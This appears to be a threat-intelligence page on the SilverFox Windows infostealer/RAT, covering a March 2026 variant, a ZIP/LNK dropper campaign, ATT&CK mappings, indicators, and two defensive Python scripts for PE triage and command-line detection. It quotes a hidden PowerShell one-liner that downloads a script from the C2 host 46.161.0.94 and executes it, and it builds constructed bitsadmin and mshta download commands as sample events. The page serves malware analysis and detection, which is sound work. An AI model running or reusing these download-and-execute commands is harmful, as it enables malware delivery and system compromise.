Mallory

SilverFox

SilverFox is a Chinese-origin Windows malware family described as an infostealer/RAT and associated with trojanized software. The reporting cited here links it to campaigns targeting Chinese-speaking users and organizations, including HR- or compliance-themed lures, and cites Knownsec 404 reporting on the SilverFox group and on the malware's use by cybercrime groups.

A documented March 2026 SilverFox variant, tagged Trojan/SilverFox.bg[qtsc], was a 64-bit PE executable disguised as a Trend Micro Titanium installer and delivered under a Chinese-language lure filename, 2026第一季度违纪人员内部调查信息.exe (roughly, "2026 Q1 internal investigation information on disciplinary violators"). The binary carried forged Trend Micro version metadata, lacked a valid Authenticode signature, and had its compile timestamp forged to a future date. Its logic was protected inside a custom virtual machine with a binary-search-tree dispatcher. The malware used ChaCha20 or a closely related Salsa20-style stream cipher to decrypt code and protect command-and-control data, stored encrypted payload blobs in the .rsrc section disguised as BITMAP resources, decrypted payloads in memory, executed shellcode, and supported staged execution. Reported anti-analysis included IsDebuggerPresent, NtQueryInformationProcess with ProcessDebugPort, NtRemoveProcessDebug, DbgUiSetThreadDebugObject, NtDuplicateObject, CPUID checks including Xen detection, and other anti-VM techniques. It also used VirtualProtect, CreateProcessAsUserW, WaitForDebugEvent, ContinueDebugEvent, CreateFileMappingW, and MapViewOfFile in support of process injection, process hollowing, and inter-process communication. Its C2 channel used Microsoft RPC over ncacn_ip_tcp via NdrAsyncClientCall; the host and port were encrypted and could not be recovered statically.
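Two of the static properties described above, a compile timestamp in the future and a missing Authenticode certificate table, can be checked on any PE file without a third-party parser. The following Python is an added example, not code from Mallory or from the cited reports: it walks the DOS, COFF and optional headers with struct, reports the two findings, and builds a minimal PE32+ header inline (a constructed sample, not the SilverFox binary) so it can be exercised offline. A present certificate table is treated only as evidence that a signature exists, not that it is valid; the slack value, function names and sizes are this example's own choices.

```python
import struct
import time

IMAGE_DIRECTORY_ENTRY_SECURITY = 4  # data directory index of the Authenticode certificate table
FUTURE_SLACK_SECONDS = 86400        # tolerate clock skew of one day (assumption of this example)


def build_minimal_pe64(timestamp, cert_size=0):
    """Construct a minimal PE32+ header for testing (constructed sample, not a real file).

    Layout: DOS header with e_lfanew -> 'PE\\0\\0' -> 20-byte COFF header -> 240-byte optional header.
    """
    e_lfanew = 0x40
    dos = b"MZ" + b"\x00" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    # COFF header: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    coff = struct.pack("<HHIIIHH", 0x8664, 0, timestamp, 0, 0, 240, 0x22)
    # Optional header: Magic 0x20B (PE32+), filler, NumberOfRvaAndSizes at offset 108, then 16 directories
    opt = struct.pack("<H", 0x20B) + b"\x00" * (108 - 2) + struct.pack("<I", 16)
    for i in range(16):
        if i == IMAGE_DIRECTORY_ENTRY_SECURITY and cert_size:
            opt += struct.pack("<II", 0x1000, cert_size)  # file offset and size of the cert table
        else:
            opt += struct.pack("<II", 0, 0)
    assert len(opt) == 240
    return dos + b"PE\0\0" + coff + opt


def triage_pe(data, now=None):
    """Return timestamp, bitness, certificate-table presence and a list of findings for a PE image."""
    now = time.time() if now is None else now
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    _machine, _nsections, timestamp, _, _, _opt_size, _chars = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic == 0x10B:      # PE32: directories at +96, NumberOfRvaAndSizes at +92
        dir_off, nrva_off = 96, 92
    elif magic == 0x20B:    # PE32+: directories at +112, NumberOfRvaAndSizes at +108
        dir_off, nrva_off = 112, 108
    else:
        raise ValueError("unknown optional header magic 0x%x" % magic)
    n_dirs = struct.unpack_from("<I", data, opt + nrva_off)[0]
    cert_size = 0
    if n_dirs > IMAGE_DIRECTORY_ENTRY_SECURITY:
        _cert_off, cert_size = struct.unpack_from(
            "<II", data, opt + dir_off + 8 * IMAGE_DIRECTORY_ENTRY_SECURITY)

    findings = []
    if timestamp > now + FUTURE_SLACK_SECONDS:
        findings.append("compile timestamp is in the future")
    if cert_size == 0:
        findings.append("no Authenticode certificate table")
    return {
        "timestamp": timestamp,
        "is_64bit": magic == 0x20B,
        "has_authenticode": cert_size > 0,   # presence only; validity needs signature verification
        "findings": findings,
    }


if __name__ == "__main__":
    now = int(time.time())
    suspicious = build_minimal_pe64(now + 10 * 365 * 86400)        # forged future timestamp, unsigned
    benign_shape = build_minimal_pe64(now - 86400, cert_size=0x2000)  # past timestamp, cert table present
    print(triage_pe(suspicious, now=now))
    print(triage_pe(benign_shape, now=now))
```

On a real file, read it with open(path, "rb") and pass the bytes to triage_pe; the two findings together match the profile of the March 2026 sample described above, and would normally be followed by signature verification and a look at the .rsrc section.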

Separate reporting also described a multi-variant ZIP/LNK dropper campaign active from at least November 2025 through April 2026 in which MalwareBazaar samples tagged Sonbokli were also tagged with SilverFox. That campaign used malicious LNK files to launch obfuscated cmd.exe, BitsAdmin, PowerShell, and mshta.exe chains, retrieved HTA files, PowerShell scripts, and a trojanized Chrome executable, and used lures in Arabic and English. ReversingLabs classified that activity as Win32.Trojan.Sonbokli, and the final payload was assessed as possibly a SilverFox variant packed with DonutLoader, but this was not confirmed because the payloads were no longer retrievable. Reported infrastructure for that campaign included C2 server 46.161.0.94 and paths such as /Mirzbow/, /mirmLAT/, /smersh/, /course/, and /chromeupd.zip. High-confidence sample identifiers for the March 2026 SilverFox RAT include SHA256 e6d8944deced4b6ec228cb1af210eb19d527107af2688b401de5503174bc1fbe, SHA1 a46c59be8e82cb05d49f288cb28df2333ee53b2b, MD5 443a741c1cdde875e8bc0307d9a657c7, and imphash 03178db0411f49be0e26499ca1def241.


MITRE ATT&CK

Techniques & procedures

13 distinct techniques documented for this family, organized by ATT&CK tactic.

Resource Development

2 techniques
T1583.001 Domains (evidence: 1)

All eleven 360news*.icu domains were bulk-registered on 2025-07-29 through Gname.com... The actor picked one cloud provider, one region, one registrar, and one personal Gmail account for the entire setup.

T1583.003 Virtual Private Server (evidence: 1)

Every IP in that list, with the exception of 95.173.197.195, is Alibaba Cloud Hong Kong (AS45102). The actor picked one cloud provider, one region, one registrar, and one personal Gmail account for the entire setup.

Initial Access

4 techniques
T1189 Drive-by Compromise (evidence: 1)

It's a single-IP SEO poisoning distribution hub running multiple thematic clusters... The software typosquat subcluster is the one worth staring at. The actor is impersonating a who's-who of desktop software across categories...

T1566 Phishing (evidence: 1)

For twelve operationally-named domains to all land on the same registrant email without privacy — and for that email to be a personal gmail.com address rather than a burner — is an operator OPSEC failure of the kind that normally gets scrubbed before the first phishing sample ever leaves the author's workstation.

T1566.001 Spearphishing Attachment (evidence: 1)

Initial Access | Phishing: Spearphishing Attachment (T1566.001) | ZIP file containing malicious LNK

T1566.002 Spearphishing Link (evidence: 1)

The actor is impersonating a who's-who of desktop software across categories ... Browsers Firefox, Edge, 360 Browser ... Messaging Telegram ... Security Huorong antivirus ... Hosting fake 'Qihoo 360 Security' download pages under a .icu TLD is low-effort social engineering that only needs to fool the subset of users who don't check domain suffixes carefully.

Execution

1 technique
T1059.001 PowerShell (evidence: 1)

powershell.exe -w Hidden $r = New-Object -ComObject 'WinHttp.WinHttpRequest.5.1'; $r.Open('GET', 'http://46.161.0.94/mirmLAT/departuredishwasher.ps1', $false); $r.SetRequestHeader('User-Agent', 'UA WindowsPowerShell'); $r.Send(); . ([ScriptBlock]::Create($r.ResponseText))

Stealth

3 techniques
T1036 Masquerading (evidence: 1)

The name "360news" is a deliberate typosquat of Qihoo 360 (奇虎360), the largest Chinese cybersecurity vendor. Hosting fake "Qihoo 360 Security" download pages under a .icu TLD is low-effort social engineering...

T1036.005 Match Legitimate Resource Name or Location (evidence: 1)

Defense Evasion | Masquerading: Match Legitimate Name (T1036.005) | LNK uses Excel/RTF icons, chrome.exe name

T1497 Virtualization/Sandbox Evasion (evidence: 1)

Behavioral indicators (from VT sandbox):
Anti-Debug: IsDebuggerPresent, GetTickCount timing checks
Sleep Evasion: Detect-debug-environment, long-sleeps

Discovery

1 technique
T1497 Virtualization/Sandbox Evasion (evidence: 1)

Behavioral indicators (from VT sandbox):
Anti-Debug: IsDebuggerPresent, GetTickCount timing checks
Sleep Evasion: Detect-debug-environment, long-sleeps

Command and Control

3 techniques
T1071 Application Layer Protocol (evidence: 1)

Two suggestive names — jackadmin reads like a C2 admin panel hostname, jackbank reads like a banking trojan overlay / fraud panel hostname — repeated five times each as a pre-provisioned batch for when the previous set gets burned.

T1105 Ingress Tool Transfer (evidence: 1)

Command and Control | Ingress Tool Transfer (T1105) | BitsAdmin/PowerShell downloading payloads

T1568.002 Domain Generation Algorithms (evidence: 1)

The two random-string companions trnebaiek.cn and eijmdixci.cn are the classic Silver Fox random-string C2 domain shape.
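The Execution and Command and Control entries above, together with the ZIP/LNK campaign described earlier on this page, describe a chain of cmd.exe spawning PowerShell, BitsAdmin and mshta.exe to fetch stages from 46.161.0.94. The following Python is an added example, not Mallory's detection logic or a rule from the cited reports: it runs three command-line rules over constructed Sysmon Event ID 1-style events and matches any URL they carry against the C2 host and paths listed on this page. The PowerShell command line is the one quoted under T1059.001; the bitsadmin and mshta command lines, the file names, the parent images and the severity scheme are constructed for the example.

```python
import re
from urllib.parse import urlsplit

# Constructed process-creation events in Sysmon Event ID 1 shape (not real telemetry).
# Event 0 carries the PowerShell line quoted on this page; the rest are constructed.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "powershell.exe -w Hidden $r = New-Object -ComObject 'WinHttp.WinHttpRequest.5.1'; "
                    "$r.Open('GET', 'http://46.161.0.94/mirmLAT/departuredishwasher.ps1', $false); "
                    "$r.SetRequestHeader('User-Agent', 'UA WindowsPowerShell'); $r.Send(); "
                    ". ([ScriptBlock]::Create($r.ResponseText))"},
    {"Image": r"C:\Windows\System32\bitsadmin.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "bitsadmin /transfer job1 http://46.161.0.94/chromeupd.zip C:\\Users\\Public\\chromeupd.zip"},
    {"Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "mshta http://46.161.0.94/smersh/index.hta"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe -NoProfile -Command Get-ChildItem C:\\Temp"},
]

# Indicators taken from this page's campaign description.
KNOWN_C2_HOSTS = {"46.161.0.94"}
KNOWN_C2_PATHS = ("/Mirzbow/", "/mirmLAT/", "/smersh/", "/course/", "/chromeupd.zip")

# Each rule names the spawned image and the command-line patterns that must all be present.
RULES = {
    # Hidden-window PowerShell pulling a script over the WinHttpRequest COM object and
    # executing it in memory via ScriptBlock::Create (the T1059.001 evidence above).
    "ps_winhttp_com_download_exec": {
        "image": r"\\powershell\.exe$",
        "all": [r"WinHttp\.WinHttpRequest", r"ScriptBlock\]::Create", r"-w(?:indowstyle)?\s+hidden"],
    },
    # BITS transfer from an HTTP(S) origin (T1105 evidence above).
    "bitsadmin_http_transfer": {"image": r"\\bitsadmin\.exe$", "all": [r"/transfer", r"https?://"]},
    # mshta handed a remote URL (HTA retrieval described in the campaign).
    "mshta_remote_url": {"image": r"\\mshta\.exe$", "all": [r"https?://"]},
}

URL_RE = re.compile(r"https?://[^\s'\"<>]+", re.IGNORECASE)


def match_rules(event):
    """Return the names of every rule whose image and all command-line patterns match."""
    hits = []
    for name, rule in RULES.items():
        if not re.search(rule["image"], event["Image"], re.IGNORECASE):
            continue
        if all(re.search(p, event["CommandLine"], re.IGNORECASE) for p in rule["all"]):
            hits.append(name)
    return hits


def extract_urls(command_line):
    return URL_RE.findall(command_line)


def ioc_hits(urls):
    """URLs whose host is a known C2 host or whose path contains a known C2 path."""
    out = []
    for u in urls:
        host = urlsplit(u).hostname or ""
        if host in KNOWN_C2_HOSTS or any(p.lower() in u.lower() for p in KNOWN_C2_PATHS):
            out.append(u)
    return out


def triage_event(event):
    rules = match_rules(event)
    urls = extract_urls(event["CommandLine"])
    hits = ioc_hits(urls)
    if rules and hits:
        severity = "high"       # behaviour plus known infrastructure
    elif rules or hits:
        severity = "medium"     # one of the two; worth a look, not yet attributable
    else:
        severity = "none"
    return {
        "rules": rules,
        "urls": urls,
        "ioc_hits": hits,
        "parent_is_cmd": event["ParentImage"].lower().endswith("\\cmd.exe"),  # LNK -> cmd.exe chain context
        "severity": severity,
    }


def scan(events):
    """Return (index, triage result) for every event that raised any finding."""
    results = [(i, triage_event(e)) for i, e in enumerate(events)]
    return [(i, r) for i, r in results if r["severity"] != "none"]


if __name__ == "__main__":
    for i, r in scan(SAMPLE_EVENTS):
        print(i, r["severity"], r["rules"], r["ioc_hits"])
```

The rules deliberately key on the LOLBin plus a behaviour rather than on the IP alone, so they keep firing after the infrastructure rotates; the IOC match then upgrades severity rather than gating the alert.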

INDICATORS OF COMPROMISE

IOCs tracked for this family

115 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.

Network
49 tracked

IPs, domains, and DNS infrastructure linked to this family.

Hashes
61 tracked

File hashes (MD5, SHA-1, SHA-256) from samples and reports.

Other
5 tracked

Other indicator types observed in public reporting.

Indicator table (values masked on the public page): one ip.v4 entry and five hash.sha256 entries, each with a latest sighting 2 days ago.